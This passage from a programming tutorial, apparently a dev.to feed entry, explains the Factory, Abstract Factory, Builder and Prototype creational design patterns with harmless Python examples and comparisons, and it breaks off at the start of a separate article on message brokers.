<p>The Factory pattern creates objects without telling the client what class to instantiate.</p> <p><strong>When to use it:</strong></p> <ul> <li>Creating different types of objects based on conditions</li> <li>Database drivers (MySQL, PostgreSQL, MongoDB)</li> <li>Payment processors (Stripe, PayPal, Square)</li> <li>Log handlers (File, Email, Slack)</li> </ul> <p><strong>Bad code (without pattern):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># You need to know about every payment type </span><span class="k">if</span> <span class="n">payment_type</span> <span class="o">==</span> <span class="sh">"</span><span class="s">stripe</span><span class="sh">"</span><span class="p">:</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">StripeProcessor</span><span class="p">()</span> <span class="k">elif</span> <span class="n">payment_type</span> <span class="o">==</span> <span class="sh">"</span><span class="s">paypal</span><span class="sh">"</span><span class="p">:</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">PayPalProcessor</span><span class="p">()</span> <span class="k">elif</span> <span class="n">payment_type</span> <span class="o">==</span> <span class="sh">"</span><span class="s">square</span><span class="sh">"</span><span class="p">:</span> <span class="n">processor</span> <span class="o">=</span> <span class="nc">SquareProcessor</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Unknown payment type</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="n">amount</span><span class="p">)</span> </code></pre> </div> <p><strong>Good code (with Factory):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">PaymentProcessor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">raise</span> <span class="nb">NotImplementedError</span> <span class="k">class</span> <span class="nc">StripeProcessor</span><span class="p">(</span><span class="n">PaymentProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with Stripe</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">PayPalProcessor</span><span class="p">(</span><span class="n">PaymentProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with PayPal</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">SquareProcessor</span><span class="p">(</span><span class="n">PaymentProcessor</span><span class="p">):</span> <span class="k">def</span> <span class="nf">process_payment</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">amount</span><span class="p">):</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Processing $</span><span class="si">{</span><span class="n">amount</span><span class="si">}</span><span class="s"> with Square</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">PaymentFactory</span><span class="p">:</span> <span class="n">_processors</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">stripe</span><span class="sh">"</span><span class="p">:</span> <span class="n">StripeProcessor</span><span class="p">,</span> <span class="sh">"</span><span class="s">paypal</span><span class="sh">"</span><span class="p">:</span> <span class="n">PayPalProcessor</span><span class="p">,</span> <span class="sh">"</span><span class="s">square</span><span class="sh">"</span><span class="p">:</span> <span class="n">SquareProcessor</span><span class="p">,</span> <span class="p">}</span> <span class="nd">@staticmethod</span> <span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">payment_type</span><span class="p">):</span> <span class="n">processor_class</span> <span class="o">=</span> <span class="n">PaymentFactory</span><span class="p">.</span><span class="n">_processors</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">payment_type</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">processor_class</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Unknown payment type: </span><span class="si">{</span><span class="n">payment_type</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">processor_class</span><span class="p">()</span> <span class="c1"># Now you just ask the factory </span><span class="n">processor</span> <span class="o">=</span> <span class="n">PaymentFactory</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span><span class="sh">"</span><span class="s">stripe</span><span class="sh">"</span><span class="p">)</span> <span class="n">processor</span><span class="p">.</span><span class="nf">process_payment</span><span class="p">(</span><span class="mi">100</span><span class="p">)</span> <span class="c1"># "Processing $100 with Stripe" </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Easy to add new types</li> <li>Decouples client from concrete classes</li> <li>Follows Open/Closed principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>More classes to manage</li> <li>Can be overkill for simple cases</li> </ul> <h3> 3. Abstract Factory Pattern </h3> <p>The Abstract Factory pattern creates <strong>families of related objects</strong> without specifying their concrete classes.</p> <p>If Factory Method answers:</p> <blockquote> <p>"Which object should I create?"</p> </blockquote> <p>Abstract Factory answers:</p> <blockquote> <p>"Which group of related objects should I create together?"</p> </blockquote> <p>Think about a real application that supports multiple databases.</p> <p>When you choose PostgreSQL, you don't just need a PostgreSQL connection.</p> <p>You also need:</p> <ul> <li>PostgreSQL repositories</li> <li>PostgreSQL query builders</li> <li>PostgreSQL transaction managers</li> </ul> <p>When you switch to MongoDB, you need the MongoDB versions of all those components.</p> <p>Without Abstract Factory, your code becomes full of conditionals.</p> <p><strong>When to use it:</strong></p> <ul> <li>Supporting multiple databases</li> <li>Multi-cloud systems (AWS, Azure, GCP)</li> <li>Cross-platform applications</li> <li>UI frameworks with multiple themes</li> <li>Plugin architectures</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">database_type</span> <span class="o">=</span> <span class="sh">"</span><span class="s">postgres</span><span class="sh">"</span> <span class="k">if</span> <span class="n">database_type</span> <span class="o">==</span> <span class="sh">"</span><span class="s">postgres</span><span class="sh">"</span><span class="p">:</span> <span class="n">connection</span> <span class="o">=</span> <span class="nc">PostgreSQLConnection</span><span class="p">()</span> <span class="n">repository</span> <span class="o">=</span> <span class="nc">PostgreSQLUserRepository</span><span class="p">()</span> <span class="n">transaction</span> <span class="o">=</span> <span class="nc">PostgreSQLTransactionManager</span><span class="p">()</span> <span class="k">elif</span> <span class="n">database_type</span> <span class="o">==</span> <span class="sh">"</span><span class="s">mongo</span><span class="sh">"</span><span class="p">:</span> <span class="n">connection</span> <span class="o">=</span> <span class="nc">MongoConnection</span><span class="p">()</span> <span class="n">repository</span> <span class="o">=</span> <span class="nc">MongoUserRepository</span><span class="p">()</span> <span class="n">transaction</span> <span class="o">=</span> <span class="nc">MongoTransactionManager</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">ValueError</span><span class="p">(</span><span class="sh">"</span><span class="s">Unsupported database</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>The problem:</p> <ul> <li> Every new database requires more conditionals</li> <li> Related objects can accidentally be mixed</li> <li> Business logic becomes tightly coupled to implementations</li> </ul> <p>Imagine accidentally creating:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">connection</span> <span class="o">=</span> <span class="nc">PostgreSQLConnection</span><span class="p">()</span> <span class="n">repository</span> <span class="o">=</span> <span class="nc">MongoUserRepository</span><span class="p">()</span> </code></pre> </div> <p>Now your application is broken.</p> <h3> Good code (with Abstract Factory) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Products </span><span class="k">class</span> <span class="nc">Connection</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">UserRepository</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">TransactionManager</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># PostgreSQL Family </span><span class="k">class</span> <span class="nc">PostgreSQLConnection</span><span class="p">(</span><span class="n">Connection</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">PostgreSQLUserRepository</span><span class="p">(</span><span class="n">UserRepository</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">PostgreSQLTransactionManager</span><span class="p">(</span><span class="n">TransactionManager</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># MongoDB Family </span><span class="k">class</span> <span class="nc">MongoConnection</span><span class="p">(</span><span class="n">Connection</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">MongoUserRepository</span><span class="p">(</span><span class="n">UserRepository</span><span class="p">):</span> <span class="k">pass</span> <span class="k">class</span> <span class="nc">MongoTransactionManager</span><span class="p">(</span><span class="n">TransactionManager</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Abstract Factory </span><span class="k">class</span> <span class="nc">DatabaseFactory</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">create_connection</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">create_repository</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">create_transaction_manager</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete Factories </span><span class="k">class</span> <span class="nc">PostgreSQLFactory</span><span class="p">(</span><span class="n">DatabaseFactory</span><span class="p">):</span> <span class="k">def</span> <span class="nf">create_connection</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">PostgreSQLConnection</span><span class="p">()</span> <span class="k">def</span> <span class="nf">create_repository</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">PostgreSQLUserRepository</span><span class="p">()</span> <span class="k">def</span> <span class="nf">create_transaction_manager</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">PostgreSQLTransactionManager</span><span class="p">()</span> <span class="k">class</span> <span class="nc">MongoFactory</span><span class="p">(</span><span class="n">DatabaseFactory</span><span class="p">):</span> <span class="k">def</span> <span class="nf">create_connection</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">MongoConnection</span><span class="p">()</span> <span class="k">def</span> <span class="nf">create_repository</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">MongoUserRepository</span><span class="p">()</span> <span class="k">def</span> <span class="nf">create_transaction_manager</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nc">MongoTransactionManager</span><span class="p">()</span> <span class="c1"># Usage </span> <span class="n">factory</span> <span class="o">=</span> <span class="nc">PostgreSQLFactory</span><span class="p">()</span> <span class="n">connection</span> <span class="o">=</span> <span class="n">factory</span><span class="p">.</span><span class="nf">create_connection</span><span class="p">()</span> <span class="n">repository</span> <span class="o">=</span> <span class="n">factory</span><span class="p">.</span><span class="nf">create_repository</span><span class="p">()</span> <span class="n">transaction</span> <span class="o">=</span> <span class="n">factory</span><span class="p">.</span><span class="nf">create_transaction_manager</span><span class="p">()</span> </code></pre> </div> <p>Now all objects belong to the same family and remain compatible.</p> <p><strong>Pros:</strong></p> <ul> <li> Guarantees compatibility between related objects</li> <li> Makes switching implementations easy</li> <li> Reduces conditional logic</li> <li> Follows the Open/Closed Principle</li> </ul> <p><strong>Cons:</strong></p> <ul> <li> Adds extra abstraction</li> <li> More classes to maintain</li> <li> Can be overkill for small projects</li> </ul> <p><strong>My Take:</strong></p> <p>Most developers don't need Abstract Factory every day.</p> <p>But when you're building systems that support multiple providers, databases, clouds, or platforms, Abstract Factory can save you from hundreds of conditionals and a lot of architectural pain.</p> <h3> 4. Builder Pattern </h3> <p>The Builder pattern constructs complex objects step by step instead of creating them with a massive constructor.</p> <p>As applications grow, objects often require many optional parameters.</p> <p>Soon you end up with constructors that are difficult to read, understand, and maintain.</p> <p>The Builder pattern solves this problem by separating the construction process from the final object.</p> <p>Think of ordering a custom computer.</p> <p>You choose:</p> <ul> <li>CPU</li> <li>RAM</li> <li>Storage</li> <li>GPU</li> <li>Operating System</li> </ul> <p>The computer is built step by step before the final product is delivered.</p> <p>That's exactly what the Builder pattern does.</p> <p><strong>When to use it</strong></p> <ul> <li>Complex configuration objects</li> <li>API request builders</li> <li>Query builders</li> <li>Domain models with many optional fields</li> <li>Object creation involving multiple steps</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">User</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span> <span class="n">self</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">email</span><span class="p">,</span> <span class="n">phone</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">address</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">role</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">avatar</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">timezone</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">language</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">name</span> <span class="n">self</span><span class="p">.</span><span class="n">email</span> <span class="o">=</span> <span class="n">email</span> <span class="n">self</span><span class="p">.</span><span class="n">phone</span> <span class="o">=</span> <span class="n">phone</span> <span class="n">self</span><span class="p">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">address</span> <span class="n">self</span><span class="p">.</span><span class="n">role</span> <span class="o">=</span> <span class="n">role</span> <span class="n">self</span><span class="p">.</span><span class="n">avatar</span> <span class="o">=</span> <span class="n">avatar</span> <span class="n">self</span><span class="p">.</span><span class="n">timezone</span> <span class="o">=</span> <span class="n">timezone</span> <span class="n">self</span><span class="p">.</span><span class="n">language</span> <span class="o">=</span> <span class="n">language</span> <span class="n">user</span> <span class="o">=</span> <span class="nc">User</span><span class="p">(</span> <span class="sh">"</span><span class="s">Mahdi</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">mahdi@example.com</span><span class="sh">"</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="bp">None</span><span class="p">,</span> <span class="sh">"</span><span class="s">UTC</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">en</span><span class="sh">"</span><span class="p">,</span> <span class="p">)</span> </code></pre> </div> <p>Problems:</p> <ul> <li>Hard to read</li> <li>Easy to pass arguments incorrectly</li> <li>Constructor grows forever</li> </ul> <h3> Good code (with Builder) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">UserBuilder</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">def</span> <span class="nf">name</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span> <span class="k">return</span> <span class="n">self</span> <span class="k">def</span> <span class="nf">email</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span> <span class="k">return</span> <span class="n">self</span> <span class="k">def</span> <span class="nf">role</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span> <span class="k">return</span> <span class="n">self</span> <span class="k">def</span> <span class="nf">timezone</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">timezone</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span> <span class="k">return</span> <span class="n">self</span> <span class="k">def</span> <span class="nf">language</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">language</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span> <span class="k">return</span> <span class="n">self</span> <span class="k">def</span> <span class="nf">build</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">user</span> <span class="n">user</span> <span class="o">=</span> <span class="p">(</span> <span class="nc">UserBuilder</span><span class="p">()</span> <span class="p">.</span><span class="nf">name</span><span class="p">(</span><span class="sh">"</span><span class="s">Mahdi</span><span class="sh">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">email</span><span class="p">(</span><span class="sh">"</span><span class="s">mahdi@example.com</span><span class="sh">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">role</span><span class="p">(</span><span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">timezone</span><span class="p">(</span><span class="sh">"</span><span class="s">UTC</span><span class="sh">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">language</span><span class="p">(</span><span class="sh">"</span><span class="s">en</span><span class="sh">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">build</span><span class="p">()</span> <span class="p">)</span> </code></pre> </div> <p>The result is far more readable.</p> <p><strong>Pros</strong></p> <ul> <li>Improves readability</li> <li>Handles optional parameters elegantly</li> <li>Makes object creation more explicit</li> <li>Avoids giant constructors</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Additional class to maintain</li> <li>Slightly more code</li> </ul> <p><strong>My Take:</strong></p> <p>Builder is one of the most practical patterns in modern software development.</p> <p>Whenever you see constructors with ten or more parameters, Builder should immediately come to mind.</p> <h3> 5. Prototype Pattern </h3> <p>The Prototype pattern creates new objects by cloning existing ones instead of constructing them from scratch.</p> <p>This pattern becomes useful when object creation is expensive, slow, or complicated.</p> <p>Rather than rebuilding everything every time, you create a copy of an existing object and modify only what changes.</p> <p>Think about document templates.</p> <p>Instead of creating a new invoice from scratch every time, you start with an invoice template and clone it.</p> <p><strong>When to use it</strong></p> <ul> <li>Expensive object creation</li> <li>Template systems</li> <li>Game development</li> <li>Document generation</li> <li>Large configuration objects</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Invoice</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span> <span class="n">self</span><span class="p">,</span> <span class="n">company_name</span><span class="p">,</span> <span class="n">company_address</span><span class="p">,</span> <span class="n">tax_rate</span><span class="p">,</span> <span class="n">footer</span><span class="p">,</span> <span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">company_name</span> <span class="o">=</span> <span class="n">company_name</span> <span class="n">self</span><span class="p">.</span><span class="n">company_address</span> <span class="o">=</span> <span class="n">company_address</span> <span class="n">self</span><span class="p">.</span><span class="n">tax_rate</span> <span class="o">=</span> <span class="n">tax_rate</span> <span class="n">self</span><span class="p">.</span><span class="n">footer</span> <span class="o">=</span> <span class="n">footer</span> <span class="n">invoice1</span> <span class="o">=</span> <span class="nc">Invoice</span><span class="p">(</span> <span class="sh">"</span><span class="s">My Company</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">New York</span><span class="sh">"</span><span class="p">,</span> <span class="mf">0.15</span><span class="p">,</span> <span class="sh">"</span><span class="s">Thank you for your business</span><span class="sh">"</span> <span class="p">)</span> <span class="n">invoice2</span> <span class="o">=</span> <span class="nc">Invoice</span><span class="p">(</span> <span class="sh">"</span><span class="s">My Company</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">New York</span><span class="sh">"</span><span class="p">,</span> <span class="mf">0.15</span><span class="p">,</span> <span class="sh">"</span><span class="s">Thank you for your business</span><span class="sh">"</span> <span class="p">)</span> <span class="n">invoice3</span> <span class="o">=</span> <span class="nc">Invoice</span><span class="p">(</span> <span class="sh">"</span><span class="s">My Company</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">New York</span><span class="sh">"</span><span class="p">,</span> <span class="mf">0.15</span><span class="p">,</span> <span class="sh">"</span><span class="s">Thank you for your business</span><span class="sh">"</span> <span class="p">)</span> </code></pre> </div> <p>The same data is repeated over and over.</p> <h3> Good code (with Prototype) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">copy</span> <span class="kn">import</span> <span class="n">deepcopy</span> <span class="k">class</span> <span class="nc">Invoice</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span> <span class="n">self</span><span class="p">,</span> <span class="n">company_name</span><span class="p">,</span> <span class="n">company_address</span><span class="p">,</span> <span class="n">tax_rate</span><span class="p">,</span> <span class="n">footer</span><span class="p">,</span> <span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">company_name</span> <span class="o">=</span> <span class="n">company_name</span> <span class="n">self</span><span class="p">.</span><span class="n">company_address</span> <span class="o">=</span> <span class="n">company_address</span> <span class="n">self</span><span class="p">.</span><span class="n">tax_rate</span> <span class="o">=</span> <span class="n">tax_rate</span> <span class="n">self</span><span class="p">.</span><span class="n">footer</span> <span class="o">=</span> <span class="n">footer</span> <span class="k">def</span> <span class="nf">clone</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">deepcopy</span><span class="p">(</span><span class="n">self</span><span class="p">)</span> <span class="n">template</span> <span class="o">=</span> <span class="nc">Invoice</span><span class="p">(</span> <span class="sh">"</span><span class="s">My Company</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">New York</span><span class="sh">"</span><span class="p">,</span> <span class="mf">0.15</span><span class="p">,</span> <span class="sh">"</span><span class="s">Thank you for your business</span><span class="sh">"</span> <span class="p">)</span> <span class="n">invoice</span> <span class="o">=</span> <span class="n">template</span><span class="p">.</span><span class="nf">clone</span><span class="p">()</span> <span class="n">invoice</span><span class="p">.</span><span class="n">customer</span> <span class="o">=</span> <span class="sh">"</span><span class="s">John Doe</span><span class="sh">"</span> <span class="n">invoice2</span> <span class="o">=</span> <span class="n">template</span><span class="p">.</span><span class="nf">clone</span><span class="p">()</span> <span class="n">invoice2</span><span class="p">.</span><span class="n">customer</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Jane Doe</span><span class="sh">"</span> </code></pre> </div> <p>Now the common configuration is defined only once.</p> <p>This is faster and easier to maintain.</p> <p><strong>Pros:</strong></p> <ul> <li>Faster object creation</li> <li>Reduces duplication</li> <li>Useful for template systems</li> <li>Simplifies complex initialization</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Deep copying can become complicated</li> <li>Circular references require care</li> </ul> <p><strong>My Take:</strong></p> <p>Prototype is less common than Factory or Builder, but when object creation becomes expensive, it's incredibly useful.</p> <p>Many developers never explicitly implement Prototype, but they use the idea constantly through templates, cloning, and copying existing configurations.</p> <h2> Quick Comparison </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Pattern</th> <th>Purpose</th> <th>Complexity</th> <th>Common Use Cases</th> </tr> </thead> <tbody> <tr> <td>Singleton</td> <td>Ensure one instance exists</td> <td>Low</td> <td>Logging, Configuration</td> </tr> <tr> <td>Factory Method</td> <td>Create objects conditionally</td> <td>Low</td> <td>Payment Providers, Storage Drivers</td> </tr> <tr> <td>Abstract Factory</td> <td>Create related families of objects</td> <td>Medium</td> <td>Databases, Cloud Providers</td> </tr> <tr> <td>Builder</td> <td>Construct complex objects step by step</td> <td>Medium</td> <td>Configurations, API Requests</td> </tr> <tr> <td>Prototype</td> <td>Clone existing objects</td> <td>Medium</td> <td>Templates, Games, Documents</td> </tr> </tbody> </table></div> <h2> Which Creational Patterns Should You Actually Use? </h2> <p>If you're building modern backend systems, these are the patterns you'll encounter most often:</p> <ul> <li> <strong>Factory Method</strong> : Probably the most common pattern in production systems. Use it whenever object creation depends on runtime conditions.</li> <li> <strong>Builder</strong> : Extremely useful for complex objects and configurations. Many modern frameworks use Builder-style APIs.</li> <li> <strong>Singleton</strong> (Carefully) : Useful for shared resources, but dependency injection is often a better choice.</li> <li> <strong>Abstract Factory</strong> : Valuable when supporting multiple providers, databases, platforms, or cloud vendors. Most small projects won't need it.</li> <li> <strong>Prototype</strong> : Less common, but powerful when object creation becomes expensive or repetitive.</li> </ul> <h2> Final Thoughts </h2> <p>Design patterns are not rules. They're tools.</p> <p>Use them when they solve real problems:</p> <ul> <li> <strong>Factory</strong> when you need to create different types</li> <li> <strong>Strategy</strong> when you have multiple ways to do something</li> <li> <strong>Repository</strong> when you need to abstract data access</li> <li> <strong>Observer</strong> when you have real events</li> <li> <strong>Decorator</strong> when you need to add features without modifying code</li> <li> <strong>Singleton</strong> carefully, and usually prefer dependency injection</li> </ul> <p>The best code is code that's easy to read, test, and change. Patterns help with that. But bad code with patterns is still bad code.</p> <p>Start with simple code. Add patterns when you need them. Don't add them "just in case."</p> <h2> What's Next? </h2> <p>This article focused entirely on <strong>Creational Design Patterns</strong>.<br> In the next article, we'll explore <strong>Structural Design Patterns</strong><br> After that, we'll dive into <strong>Behavioral Design Patterns</strong></p> <p>Each article will include practical Python examples, production use cases, common mistakes, and guidance on when a pattern is actually worth using.</p> <p>Stay tuned.</p> <h2> Want More? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxlzd1mi8zerrajwz4ys.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxlzd1mi8zerrajwz4ys.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>If you enjoyed this deep dive, check out my other articles:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">Message Brokers in 2026: Kafka, RabbitMQ, NATS — Which One Should You Really Use</a> — Architecture decisions</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities</a> — Security patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them</a> — Attack patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">Durable Workflow Engines: Temporal vs dbt OS vs Transact vs Prefect</a> — System patterns</li> </ul> <p>🔗 <strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 <strong>Telegram:</strong> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 <strong>Instagram:</strong> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><strong>Author: Mahdi Shamlou | مهدی شاملو</strong></p> ai webdev programming tutorial Message Brokers Comparison 2026 — Kafka, RabbitMQ, NATS & Redis Streams: Which One Should You Choose? | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Thu, 28 May 2026 13:53:26 +0000 https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8 https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8 <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <p>if you’ve read my <a 